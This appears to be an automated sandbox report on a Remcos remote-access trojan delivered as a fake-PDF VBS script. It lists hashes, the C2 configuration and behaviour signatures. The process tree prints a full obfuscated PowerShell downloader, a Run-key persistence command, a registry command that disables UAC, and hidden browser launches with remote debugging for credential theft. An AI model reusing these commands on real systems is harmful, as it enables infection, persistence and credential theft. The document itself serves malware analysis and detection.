Analysis

  • max time kernel
    300s
  • max time network
    299s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/11/2024, 10:15 UTC

General

  • Target

    202411_1801_ckc30w030l01_20241118182920618388·pdf.vbs

  • Size

    16KB

  • MD5

    e6c723d6a40150466aa011158c68e591

  • SHA1

    f18348ee740329c6cb706123b34151dde9197b50

  • SHA256

    969d4f51528c1a62de42fd8dfc0efaf09b1857426add53376a3e2db14456a173

  • SHA512

    c9c85c17c329267d8dbed3441baa63c85cbd0abbad858dfd86632de8cd97b461d8f36c4b4fbd126712cd2664ba1e6bd2eece30fb090b9ff462ac4c052b204256

  • SSDEEP

    384:X+7h2tykhjtUXkNaaYtydrEVql1UnqCrP0z9CW6fz83W4u8b:GUtbto31+rOqcnqCrMZuA3nb

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

jwdtcx3kfb.duckdns.org:47392

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-JY1QRO

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\202411_1801_ckc30w030l01_20241118182920618388·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cartograms Repaganisers Grejss Fiberkufferterne cnidoblast Ansgningsfristen Bromkaliummet #><#Sash Multielectrode Bruttoetagearealets pentaglottical #>$Erode72='Fashionabelt';function Erosely($Hedens){If ($host.DebuggerEnabled) {$Geolatry=4} for ($Catechus=$Geolatry;;$Catechus+=5){if(!$Hedens[$Catechus]) { break }$Moderne242+=$Hedens[$Catechus]}$Moderne242}function Sammenkogs($aimwre){ .($astichous) ($aimwre)}$Tamises=Erosely ',remn .atEA.ostGips.t.ikWPillEPhotbWhorcRe iLNudii.ecie Sp n esct';$Whitecup=Erosely 'NoveM ,ntoTreyzFagtiMucolOdorlTr kaFaar/';$Opklaringsstyrkes=Erosely 'R diTDogml Kr sBest1 ea2';$gennembruds='Glut[Flj.NPre E ftet Mo .GallSBag eAfgir Medv S,niM,ltCLustEBladPp.epoTenniTrusnDamatSomtMRiveaDeminInd.AWarsg HalEVskerHyst]Pres: Sk :UnicsAfseEBacac P ru Co Rt veISndrtFlosYHe,tpTes RS eao BagtUnnooArchC WaxoSkr LSka =Terr$TusiOHeltpyamsKKretL UslALea,RSkueiVa,tNAmmogF jlSSubdS NontBonnYBud RBoliK MereFaceS';$Whitecup+=Erosely '.edb5Mobu.Ruff0Konf Mrke(AutoW r niPap nUri dSubsoSubmw E,osVeks SubsNPeakTspor Semi1 Kni0 er.,bje0 Ur.;Star GejsW T miResonOver6Depu4Herl;Udf. KnskxFav 6 dsu4 Uds;Sup Krydr SpivC ta:Extr1.rae3 Uns1Fix .Velv0 Hyp)Hove BifiGTrafeProgcFagbksl no tau/Snar2Burg0Ud,a1 an0spa 0inte1 ab,0 Cla1Hy t NewsFMultisinurBudseLongfF geoFrikx eta/Impr1 Dvr3Occi1Tils.S,lv0';$Sarcomatosis193=Erosely 'SaliUOosps PoseElfir Ph - AtoaSalmG.tavEDecunDokut';$Viderebringelse=Erosely ' FerhDrabt Im,tVealpWebssV mp:Domy/tilk/,ntad Betr Evai Disv ReneLaka.FilogBeboo urbo Pr.gU,stl DaveRosf. H pcEgepo GanmJibs/S,stuIncoc To,?Gr,meCyulxRosepAw soUngrrRevet Au =KastdQuieoGravwStarnMa.tlFo koDet aKl ddPaak&AadsiGivtdSu,e=Rede1.lexpElev7BjlkKapriVSu fTpauljethnL ociQTr bH ForcFar Rfran-Pla -Sge.4 ,orrhemoS Kd BUnmuw ParnBhat5AnnaY DomLPhipk utrXSyndz .edETraa5DholyAstiuSmudZ ArczSka.8';$Stikpillers170=Erosely 'Cask>';$astichous=Erosely ' arii MazeAfteX';$Boretaarnene='Photoplaywright';$Scena='\Benzinmotorernes218.Gna';Sammenkogs (Erosely 'Arta$RascGAnisLStedO.lumbChapA Aerl.nva:AreomVskeuTrivs.ublhFrimrForuoL ejoWal MHj.miU.irN EryGFr m=ko,t$FusiEDekoNHe nVGu t:TigeADdssPskripC rnddrgsAO,seTT leaGene+J ke$ ohaSF utCDisteD.aeN myea');Sammenkogs (Erosely 'B ge$ SocGRefuL G,uOForlb,orga gygLWho :Hva,PNyphl ChoEUndeT oothEngaowhenR C lOIn nU spisafma= Pas$BrakVAfocIAssuDDomse EmpRPhotEStavB ttarArrhI ,eknZinkgAnnoEKla l OprsCrutE Fu,.DaglsAne pI dflRelaI SkgTAnae( Ph,$BelyS bnoT catIO hiK Cirp E tISjusl S llF ureOverR AgesR nd1Stil7Min 0 Den)');Sammenkogs (Erosely $gennembruds);$Viderebringelse=$Plethorous[0];$Catechusnosilicate=(Erosely 'Disl$O,emGCystLPoinOSev BFuckaTrinlAmob:Aff,psjleoPerfsanimIRhintSammiSikrOHorvNMid s An,L VinITopmsboe tJo vE GruRK ranBedie iss nt= otiNUd rEReacwB sl-sammoskrib,ikkJS.kteepi.c,osit.erv .chaS pmny .onsSt aTFormES enMarch.nond$Car,TForea BlaM kywi macSPreseM lls');Sammenkogs ($Catechusnosilicate);Sammenkogs (Erosely 'Ophr$phoePEligoFurzsSal i ScotAyi iSempoSprin.hyssOccal berisagasSammtArkaeHukkrSh.rnEgeneMurusupqu.EnliH SumeGanga GendSpeceDesir ligsTrou[ Fst$PhagSLibiaPolyrGigacLimsoAncim,abbaT rbt StooUncosCowli entsDe a1 Pol9Circ3C ri]Oste= Eun$DkssWHjerh Ur.iUngat H meModtcShowuMl ep');$Unskirted=Erosely 'Laby$ koPGraao Cens anaiNunatRykkiForsoRepanKon s Bill BraiUnvis Tint Anne rejr dsn rygeVicesTh s.PredDRampodiasw FodnSwinlKonso Yr aFascd TakFAcc iBor lAgele Sci(rhin$S,eoVB.yniDrf dSvove St.ropune ConbSemirErnriHoevn iblgGaw eResnlG lls RepeInte, O e$Pol,F NonlTedeaRiftsSa tkFa.oeWhi rErineKlipnTyndsk.meeLgprrKlov)';$Flaskerenser=$mushrooming;Sammenkogs (Erosely 'thor$NitrGEp klFrisosterBBarsaL gtLUdls:InelS Udia B,fM Su mUdyreAnkeN ng KUnunnEleny Ab,tRe.stSub E St,DPrevEF lk= Neu(CombTUnope MisSelevtPoly- upipBak,aComstTrouhPr,n Afp$ DolF H xlGrnlaLag SK,rsKPolyeOsteRt anEPro Nh,emSOmdmESelvRper )');while (!$Sammenknyttede) {Sammenkogs (Erosely 'Bolo$SpirgRenslR,nsoNonpb Rega TmrlPina:BursBLoegaLim tSlurhItery Dets Tenc .teaAsocp LaahHapaeAbibs Mic=C st$in.eEhka uAreorUnd oPearm MyrnDolmtColuelazyr') ;Sammenkogs $Unskirted;Sammenkogs (Erosely 'Un.rSFribt N.ka KamrHj mtA gu-HypeSRundlYdelES.rteEndapRver Cl.4');Sammenkogs (Erosely 'Stud$Cyang TralUnivORottBIn.rAPietlBaga:Un esHydrAMonom SpemBouleS mmNF ankMillNethnySurvt rict,ntieEfteDmo oEIgno= Rec(anertGorgERikosWaxbT o v- BlopUartaWormtAsf Ho al krl$retsFE,zoLMa sa TaksPeliKVerdE Uger ErhEE stNH,loS PreE IjorSvr )') ;Sammenkogs (Erosely ' Ol $ forgGan l hoOO.igB beaAantiLMapp:PullFmidteTyenM ankt spaE Stan ilrApunnaVaerR ieps Camf larDSineshearePretlskilsExpadArk.aKattgAd mEEry.NMark5 Par1Gill=L nd$GuarG Fral.fseOin fbScraaO,deLResi: HenFAgatESmutiOestN jlesConcC.iochStttMun oEHolac.nthkZedsE MauRSlibE rosPara+Fugl+Budd% P a$Con pTrafL upeE unTWitchPolyoBindRMercO FaluSmukS Cau.Sa tc ,tooDispUS idnPibet') ;$Viderebringelse=$Plethorous[$Femtenaarsfdselsdagen51]}$Sabbatic=334089;$Afkog=31095;Sammenkogs (Erosely 'K.es$ IrrgIn oL BesOHe,tBKomoaAfmrLBorg:un rgHjemHFemua K orkr,trVindI SpaeG aiS.osy Ov.r=Soci SupgUnivEB batKvad-F dsC Rito fl NHe nTMiljE QuaNAdreT Byl Disc$BiosF eadLSnotaIn uS VerkL veESchoR .oleoverNKeyssrecieC.llR');Sammenkogs (Erosely 'Se.r$Inddg Klel Denocubeb Reda,yvulBegr:OccuSTyk.tPrisuSkuld.inosec imBl nu KersTa,reGrapnGas. Vri =Woad Qui[Dev SRetry olss Au tPuriecoapm M a.SiksCTo.doPickn .ulvCalleSy drforvtHalo]Tote: Det:m scFLa cr kedoFilam FjoB ifaHattsposeePin,6 De,4DykkS ductLi,erTek iSpinn bongLano( Man$DunaG T ghDiviaD lfrImp,rkendiStene W,esStag)');Sammenkogs (Erosely 'Sapr$ HaeGVi elUn xO addbE kyAUn.iLtvan:EurotBoraOUnmecPatro Cykl Ha.oNonsG Fi IBereeFedtS End brud=Stra Gar [ artSUnply edeSFlotTV,ndEGradMBolu. VipTPi eEStrmXPerstSlag.M tee tdn izzcc,ttOMultDArc i U enCadugArbu]Areo:Daga:chitaH,nsSHypoc RosIUnv iGrn..Kan Gsa oE NikTSid sAccot OfrRenliiDi knDivig Fej(I.gt$Brofsra,gTRetru ,uqDOccuSBredm,geluRdehsTegle ogenAfre)');Sammenkogs (Erosely 'Hunh$Laesg cenlFa eoTargBDemeAForslLati: Gi R SkieLat,PEvo,ULandr.fteiGeniF Rk IAtomc Ho,adansTPropiSpiooFjo NMism7Ti e9 Gal=Ager$AangtKlumOS mmCTo uO ,eiLLahlodiskGEx.uI Gr e RevS eb.T.nds HoruW,reBVectSSemiT GuirRescI ChanMetagHe n( Eks$ StrsPly a FrabTrolBDuppaDucstHj oi,omecGuld,Idol$ PelaTragFBr.dKOveroUntrG dep)');Sammenkogs $Repurification79;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3980
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Cartograms Repaganisers Grejss Fiberkufferterne cnidoblast Ansgningsfristen Bromkaliummet #><#Sash Multielectrode Bruttoetagearealets pentaglottical #>$Erode72='Fashionabelt';function Erosely($Hedens){If ($host.DebuggerEnabled) {$Geolatry=4} for ($Catechus=$Geolatry;;$Catechus+=5){if(!$Hedens[$Catechus]) { break }$Moderne242+=$Hedens[$Catechus]}$Moderne242}function Sammenkogs($aimwre){ .($astichous) ($aimwre)}$Tamises=Erosely ',remn .atEA.ostGips.t.ikWPillEPhotbWhorcRe iLNudii.ecie Sp n esct';$Whitecup=Erosely 'NoveM ,ntoTreyzFagtiMucolOdorlTr kaFaar/';$Opklaringsstyrkes=Erosely 'R diTDogml Kr sBest1 ea2';$gennembruds='Glut[Flj.NPre E ftet Mo .GallSBag eAfgir Medv S,niM,ltCLustEBladPp.epoTenniTrusnDamatSomtMRiveaDeminInd.AWarsg HalEVskerHyst]Pres: Sk :UnicsAfseEBacac P ru Co Rt veISndrtFlosYHe,tpTes RS eao BagtUnnooArchC WaxoSkr LSka =Terr$TusiOHeltpyamsKKretL UslALea,RSkueiVa,tNAmmogF jlSSubdS NontBonnYBud RBoliK MereFaceS';$Whitecup+=Erosely '.edb5Mobu.Ruff0Konf Mrke(AutoW r niPap nUri dSubsoSubmw E,osVeks SubsNPeakTspor Semi1 Kni0 er.,bje0 Ur.;Star GejsW T miResonOver6Depu4Herl;Udf. KnskxFav 6 dsu4 Uds;Sup Krydr SpivC ta:Extr1.rae3 Uns1Fix .Velv0 Hyp)Hove BifiGTrafeProgcFagbksl no tau/Snar2Burg0Ud,a1 an0spa 0inte1 ab,0 Cla1Hy t NewsFMultisinurBudseLongfF geoFrikx eta/Impr1 Dvr3Occi1Tils.S,lv0';$Sarcomatosis193=Erosely 'SaliUOosps PoseElfir Ph - AtoaSalmG.tavEDecunDokut';$Viderebringelse=Erosely ' FerhDrabt Im,tVealpWebssV mp:Domy/tilk/,ntad Betr Evai Disv ReneLaka.FilogBeboo urbo Pr.gU,stl DaveRosf. H pcEgepo GanmJibs/S,stuIncoc To,?Gr,meCyulxRosepAw soUngrrRevet Au =KastdQuieoGravwStarnMa.tlFo koDet aKl ddPaak&AadsiGivtdSu,e=Rede1.lexpElev7BjlkKapriVSu fTpauljethnL ociQTr bH ForcFar Rfran-Pla -Sge.4 ,orrhemoS Kd BUnmuw ParnBhat5AnnaY DomLPhipk utrXSyndz .edETraa5DholyAstiuSmudZ ArczSka.8';$Stikpillers170=Erosely 'Cask>';$astichous=Erosely ' arii MazeAfteX';$Boretaarnene='Photoplaywright';$Scena='\Benzinmotorernes218.Gna';Sammenkogs (Erosely 'Arta$RascGAnisLStedO.lumbChapA Aerl.nva:AreomVskeuTrivs.ublhFrimrForuoL ejoWal MHj.miU.irN EryGFr m=ko,t$FusiEDekoNHe nVGu t:TigeADdssPskripC rnddrgsAO,seTT leaGene+J ke$ ohaSF utCDisteD.aeN myea');Sammenkogs (Erosely 'B ge$ SocGRefuL G,uOForlb,orga gygLWho :Hva,PNyphl ChoEUndeT oothEngaowhenR C lOIn nU spisafma= Pas$BrakVAfocIAssuDDomse EmpRPhotEStavB ttarArrhI ,eknZinkgAnnoEKla l OprsCrutE Fu,.DaglsAne pI dflRelaI SkgTAnae( Ph,$BelyS bnoT catIO hiK Cirp E tISjusl S llF ureOverR AgesR nd1Stil7Min 0 Den)');Sammenkogs (Erosely $gennembruds);$Viderebringelse=$Plethorous[0];$Catechusnosilicate=(Erosely 'Disl$O,emGCystLPoinOSev BFuckaTrinlAmob:Aff,psjleoPerfsanimIRhintSammiSikrOHorvNMid s An,L VinITopmsboe tJo vE GruRK ranBedie iss nt= otiNUd rEReacwB sl-sammoskrib,ikkJS.kteepi.c,osit.erv .chaS pmny .onsSt aTFormES enMarch.nond$Car,TForea BlaM kywi macSPreseM lls');Sammenkogs ($Catechusnosilicate);Sammenkogs (Erosely 'Ophr$phoePEligoFurzsSal i ScotAyi iSempoSprin.hyssOccal berisagasSammtArkaeHukkrSh.rnEgeneMurusupqu.EnliH SumeGanga GendSpeceDesir ligsTrou[ Fst$PhagSLibiaPolyrGigacLimsoAncim,abbaT rbt StooUncosCowli entsDe a1 Pol9Circ3C ri]Oste= Eun$DkssWHjerh Ur.iUngat H meModtcShowuMl ep');$Unskirted=Erosely 'Laby$ koPGraao Cens anaiNunatRykkiForsoRepanKon s Bill BraiUnvis Tint Anne rejr dsn rygeVicesTh s.PredDRampodiasw FodnSwinlKonso Yr aFascd TakFAcc iBor lAgele Sci(rhin$S,eoVB.yniDrf dSvove St.ropune ConbSemirErnriHoevn iblgGaw eResnlG lls RepeInte, O e$Pol,F NonlTedeaRiftsSa tkFa.oeWhi rErineKlipnTyndsk.meeLgprrKlov)';$Flaskerenser=$mushrooming;Sammenkogs (Erosely 'thor$NitrGEp klFrisosterBBarsaL gtLUdls:InelS Udia B,fM Su mUdyreAnkeN ng KUnunnEleny Ab,tRe.stSub E St,DPrevEF lk= Neu(CombTUnope MisSelevtPoly- upipBak,aComstTrouhPr,n Afp$ DolF H xlGrnlaLag SK,rsKPolyeOsteRt anEPro Nh,emSOmdmESelvRper )');while (!$Sammenknyttede) {Sammenkogs (Erosely 'Bolo$SpirgRenslR,nsoNonpb Rega TmrlPina:BursBLoegaLim tSlurhItery Dets Tenc .teaAsocp LaahHapaeAbibs Mic=C st$in.eEhka uAreorUnd oPearm MyrnDolmtColuelazyr') ;Sammenkogs $Unskirted;Sammenkogs (Erosely 'Un.rSFribt N.ka KamrHj mtA gu-HypeSRundlYdelES.rteEndapRver Cl.4');Sammenkogs (Erosely 'Stud$Cyang TralUnivORottBIn.rAPietlBaga:Un esHydrAMonom SpemBouleS mmNF ankMillNethnySurvt rict,ntieEfteDmo oEIgno= Rec(anertGorgERikosWaxbT o v- BlopUartaWormtAsf Ho al krl$retsFE,zoLMa sa TaksPeliKVerdE Uger ErhEE stNH,loS PreE IjorSvr )') ;Sammenkogs (Erosely ' Ol $ forgGan l hoOO.igB beaAantiLMapp:PullFmidteTyenM ankt spaE Stan ilrApunnaVaerR ieps Camf larDSineshearePretlskilsExpadArk.aKattgAd mEEry.NMark5 Par1Gill=L nd$GuarG Fral.fseOin fbScraaO,deLResi: HenFAgatESmutiOestN jlesConcC.iochStttMun oEHolac.nthkZedsE MauRSlibE rosPara+Fugl+Budd% P a$Con pTrafL upeE unTWitchPolyoBindRMercO FaluSmukS Cau.Sa tc ,tooDispUS idnPibet') ;$Viderebringelse=$Plethorous[$Femtenaarsfdselsdagen51]}$Sabbatic=334089;$Afkog=31095;Sammenkogs (Erosely 'K.es$ IrrgIn oL BesOHe,tBKomoaAfmrLBorg:un rgHjemHFemua K orkr,trVindI SpaeG aiS.osy Ov.r=Soci SupgUnivEB batKvad-F dsC Rito fl NHe nTMiljE QuaNAdreT Byl Disc$BiosF eadLSnotaIn uS VerkL veESchoR .oleoverNKeyssrecieC.llR');Sammenkogs (Erosely 'Se.r$Inddg Klel Denocubeb Reda,yvulBegr:OccuSTyk.tPrisuSkuld.inosec imBl nu KersTa,reGrapnGas. Vri =Woad Qui[Dev SRetry olss Au tPuriecoapm M a.SiksCTo.doPickn .ulvCalleSy drforvtHalo]Tote: Det:m scFLa cr kedoFilam FjoB ifaHattsposeePin,6 De,4DykkS ductLi,erTek iSpinn bongLano( Man$DunaG T ghDiviaD lfrImp,rkendiStene W,esStag)');Sammenkogs (Erosely 'Sapr$ HaeGVi elUn xO addbE kyAUn.iLtvan:EurotBoraOUnmecPatro Cykl Ha.oNonsG Fi IBereeFedtS End brud=Stra Gar [ artSUnply edeSFlotTV,ndEGradMBolu. VipTPi eEStrmXPerstSlag.M tee tdn izzcc,ttOMultDArc i U enCadugArbu]Areo:Daga:chitaH,nsSHypoc RosIUnv iGrn..Kan Gsa oE NikTSid sAccot OfrRenliiDi knDivig Fej(I.gt$Brofsra,gTRetru ,uqDOccuSBredm,geluRdehsTegle ogenAfre)');Sammenkogs (Erosely 'Hunh$Laesg cenlFa eoTargBDemeAForslLati: Gi R SkieLat,PEvo,ULandr.fteiGeniF Rk IAtomc Ho,adansTPropiSpiooFjo NMism7Ti e9 Gal=Ager$AangtKlumOS mmCTo uO ,eiLLahlodiskGEx.uI Gr e RevS eb.T.nds HoruW,reBVectSSemiT GuirRescI ChanMetagHe n( Eks$ StrsPly a FrabTrolBDuppaDucstHj oi,omecGuld,Idol$ PelaTragFBr.dKOveroUntrG dep)');Sammenkogs $Repurification79;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3244
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4828
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Aabeskyttelseslinien% -windowstyle 1 $Banegaardenes=(gp -Path 'HKCU:\Software\Crinums\').Checkkontoens;%Aabeskyttelseslinien% ($Banegaardenes)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5080
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Aabeskyttelseslinien% -windowstyle 1 $Banegaardenes=(gp -Path 'HKCU:\Software\Crinums\').Checkkontoens;%Aabeskyttelseslinien% ($Banegaardenes)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1272
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3548
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2088
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2168
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffef07ecc40,0x7ffef07ecc4c,0x7ffef07ecc58
          4⤵
            PID:2156
          • C:\Program Files\Google\Chrome\Application\Chrome.exe
            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2176,i,3075773572028056090,2708610522113641277,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2172 /prefetch:2
            4⤵
              PID:380
            • C:\Program Files\Google\Chrome\Application\Chrome.exe
              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1812,i,3075773572028056090,2708610522113641277,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2372 /prefetch:3
              4⤵
                PID:2336
              • C:\Program Files\Google\Chrome\Application\Chrome.exe
                "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1960,i,3075773572028056090,2708610522113641277,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2384 /prefetch:8
                4⤵
                  PID:2112
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,3075773572028056090,2708610522113641277,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:1876
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,3075773572028056090,2708610522113641277,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3220 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:5020
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4644,i,3075773572028056090,2708610522113641277,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4604 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:5032
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xjclgjvtsdsuyqpziwoqkttvil"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:3388
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\hdidgunnglkzbfldaharngomrrebc"
                3⤵
                • Accesses Microsoft Outlook accounts
                • System Location Discovery: System Language Discovery
                PID:468
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kfnohmyoutcellzhjsntylivzywkdsshq"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3868
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                3⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Modifies registry class
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of FindShellTrayWindow
                PID:1124
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
